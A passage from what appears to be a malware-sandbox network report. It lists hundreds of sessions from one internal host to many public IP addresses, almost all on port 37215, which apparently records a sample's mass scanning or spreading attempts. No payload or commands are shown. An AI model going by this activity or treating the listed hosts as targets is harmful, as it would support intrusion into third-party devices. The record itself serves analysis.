                                          14169192.168.2.235137441.22.24.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14170192.168.2.233830841.159.109.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14171192.168.2.234591241.81.6.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14172192.168.2.234146441.138.57.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14173192.168.2.2351618197.108.90.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14174192.168.2.234998041.122.217.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14175192.168.2.233865441.214.94.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14176192.168.2.234493641.65.50.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14177192.168.2.234541841.241.39.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14178192.168.2.2349022197.252.4.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14179192.168.2.2357726157.244.227.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14180192.168.2.2345878157.56.184.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14181192.168.2.2352480197.205.55.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14182192.168.2.235594241.6.34.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14183192.168.2.235318092.94.80.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14184192.168.2.236052441.148.77.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14185192.168.2.2341202100.152.236.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14186192.168.2.2332792197.129.145.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14187192.168.2.234077641.255.230.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14188192.168.2.2345444160.191.78.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14189192.168.2.2354582213.65.69.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14190192.168.2.2335832197.132.4.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14191192.168.2.2358690157.120.105.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14192192.168.2.2341426197.208.47.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14193192.168.2.2337742197.160.74.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14194192.168.2.2360572154.252.62.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14195192.168.2.2350886157.23.190.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14196192.168.2.2340940197.118.91.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14197192.168.2.235257641.81.122.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14198192.168.2.2334376197.227.247.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14199192.168.2.2346966157.96.110.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14200192.168.2.2353920157.79.143.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14201192.168.2.2359912157.73.141.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14202192.168.2.235080634.223.68.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14203192.168.2.236029460.23.158.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14204192.168.2.235841041.87.24.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14205192.168.2.233894841.66.100.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14206192.168.2.234540041.224.212.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14207192.168.2.2338320197.85.78.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14208192.168.2.2353074197.192.150.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14209192.168.2.2352962197.228.187.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14210192.168.2.235887424.208.214.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14211192.168.2.235450441.234.204.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14212192.168.2.2357686157.92.4.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14213192.168.2.2341102157.73.8.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14214192.168.2.2355112157.159.245.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14215192.168.2.2359656157.59.23.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14216192.168.2.2332782157.48.200.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14217192.168.2.235970441.230.106.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14218192.168.2.2339040130.202.163.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14219192.168.2.2340442197.51.173.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14220192.168.2.234548841.127.216.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14221192.168.2.2347488197.193.141.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14222192.168.2.234822841.110.224.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14223192.168.2.233751441.40.162.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14224192.168.2.233751441.246.147.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14225192.168.2.2357946157.165.90.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14226192.168.2.2349450197.136.47.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14227192.168.2.233804652.61.151.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14228192.168.2.235607441.243.186.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14229192.168.2.234049823.55.20.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14230192.168.2.2340448157.25.224.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14231192.168.2.2333638157.167.223.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14232192.168.2.2338104197.10.181.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14233192.168.2.2345852157.168.60.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14234192.168.2.2353790197.109.191.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14235192.168.2.2341956157.114.128.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14236192.168.2.2356574197.233.238.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14237192.168.2.2340620157.15.61.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14238192.168.2.2335658157.122.116.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14239192.168.2.2350298157.49.218.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14240192.168.2.2352914197.167.53.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14241192.168.2.2360794157.243.171.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14242192.168.2.235279441.172.1.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14243192.168.2.2336874157.99.127.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14244192.168.2.2353758160.235.65.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14245192.168.2.2354700197.117.234.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14246192.168.2.2346390197.106.252.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14247192.168.2.233870884.215.17.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14248192.168.2.235655641.91.185.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14249192.168.2.235892441.139.116.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14250192.168.2.233593613.127.129.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14251192.168.2.234844469.59.110.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14252192.168.2.2354748197.172.110.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14253192.168.2.233655812.64.33.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14254192.168.2.234240441.242.145.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14255192.168.2.234396041.95.117.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14256192.168.2.2334290197.254.85.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14257192.168.2.2334248133.133.41.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14258192.168.2.2354898157.218.40.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14259192.168.2.233898441.64.205.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14260192.168.2.233397441.83.203.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14261192.168.2.2342252157.93.56.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14262192.168.2.2341916157.227.229.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14263192.168.2.234876041.169.133.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14264192.168.2.235496041.250.83.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14265192.168.2.233606257.2.230.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14266192.168.2.234239841.158.127.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14267192.168.2.2336086157.44.236.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14268192.168.2.2341408197.221.153.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14269192.168.2.2359026157.137.139.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14270192.168.2.2352392197.90.101.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14271192.168.2.2352192197.19.27.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14272192.168.2.2355830197.196.170.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14273192.168.2.2352370157.82.220.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14274192.168.2.2352640197.81.156.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14275192.168.2.2340202197.125.134.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14276192.168.2.2350984191.227.152.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14277192.168.2.2350776157.146.169.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14278192.168.2.2353810202.126.180.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14279192.168.2.2357794197.156.22.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14280192.168.2.234842441.252.126.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14281192.168.2.2338470157.17.157.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14282192.168.2.235558641.63.125.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14283192.168.2.235703241.101.249.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14284192.168.2.2336916157.68.19.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14285192.168.2.2342000197.81.191.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14286192.168.2.2340644103.172.140.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14287192.168.2.234264424.168.218.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14288192.168.2.2350422197.156.58.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14289192.168.2.234638641.241.78.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14290192.168.2.2344248197.157.180.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14291192.168.2.2352122157.226.100.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14292192.168.2.2335594197.187.15.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14293192.168.2.235096418.27.35.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14294192.168.2.2350484157.215.62.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14295192.168.2.233540641.225.27.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14296192.168.2.2343258163.163.177.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14297192.168.2.2356176197.202.149.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14298192.168.2.2344026157.184.187.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14299192.168.2.2338068157.238.118.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14300192.168.2.2350192197.163.107.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14301192.168.2.234978441.9.237.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14302192.168.2.2334402157.166.30.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14303192.168.2.2351400197.68.187.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14304192.168.2.2334680157.180.149.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14305192.168.2.2337054197.163.52.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14306192.168.2.2335714197.253.4.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14307192.168.2.235753470.129.37.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14308192.168.2.234986441.196.213.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14309192.168.2.235795641.36.178.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14310192.168.2.233954841.142.35.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14311192.168.2.235389841.39.225.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14312192.168.2.2333962197.107.58.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14313192.168.2.2344990197.207.62.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14314192.168.2.2349462152.192.145.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14315192.168.2.235072664.29.67.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14316192.168.2.234536641.66.94.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14317192.168.2.234669241.249.37.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14318192.168.2.235198441.51.214.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14319192.168.2.2347220157.17.89.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14320192.168.2.2347154197.216.224.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14321192.168.2.2348620197.151.247.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14322192.168.2.2343358197.228.19.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14323192.168.2.2334006157.76.205.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14324192.168.2.2346066197.24.200.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14325192.168.2.2348770157.9.199.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14326192.168.2.2335042157.144.170.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14327192.168.2.2338034157.242.79.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14328192.168.2.2345130189.101.130.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14329192.168.2.2337912197.240.224.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14330192.168.2.234163841.251.20.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14331192.168.2.235124641.1.253.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14332192.168.2.2349942110.254.75.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14333192.168.2.2338892157.23.14.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14334192.168.2.234002057.107.60.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14335192.168.2.2348026197.232.199.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14336192.168.2.234399841.4.128.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14337192.168.2.233873041.254.19.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14338192.168.2.2350480157.251.251.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14339192.168.2.234817419.148.227.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14340192.168.2.235436852.72.167.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14341192.168.2.2345082193.39.233.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14342192.168.2.2352214157.14.70.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14343192.168.2.233858241.162.119.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14344192.168.2.2335376197.186.158.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14345192.168.2.2350534157.50.64.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14346192.168.2.233667041.10.57.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14347192.168.2.2358938157.10.16.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14348192.168.2.2344838157.37.142.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14349192.168.2.2352018197.6.126.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14350192.168.2.2338880157.173.165.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14351192.168.2.233428441.13.252.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14352192.168.2.2340150197.84.68.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14353192.168.2.234215041.89.65.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14354192.168.2.2335192157.113.222.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14355192.168.2.2352542200.32.62.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14356192.168.2.2337280197.101.4.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14357192.168.2.233623064.144.244.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14358192.168.2.2337634157.105.59.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14359192.168.2.2341572176.128.234.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14360192.168.2.2334678174.238.115.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14361192.168.2.2333564157.167.83.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14362192.168.2.234923441.219.203.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14363192.168.2.2346068161.134.247.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14364192.168.2.2352144198.222.136.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14365192.168.2.2351074197.41.19.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14366192.168.2.2336110197.225.201.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14367192.168.2.235097041.223.213.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14368192.168.2.2352888195.230.185.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14369192.168.2.235115241.159.218.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14370192.168.2.2339194157.68.91.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14371192.168.2.2341416157.109.6.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14372192.168.2.2353108157.35.253.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14373192.168.2.2346996157.195.132.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14374192.168.2.234781041.20.75.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14375192.168.2.2338100197.194.152.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14376192.168.2.2337788217.35.166.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14377192.168.2.2341494146.21.47.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14378192.168.2.2358242197.35.39.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14379192.168.2.2343774157.97.133.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14380192.168.2.2359870157.207.133.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14381192.168.2.2342116197.143.19.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14382192.168.2.2335396197.168.17.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14383192.168.2.2349270157.69.219.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14384192.168.2.235998241.141.126.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14385192.168.2.2337238197.32.72.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14386192.168.2.234416641.41.68.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14387192.168.2.2336878157.3.145.7537215
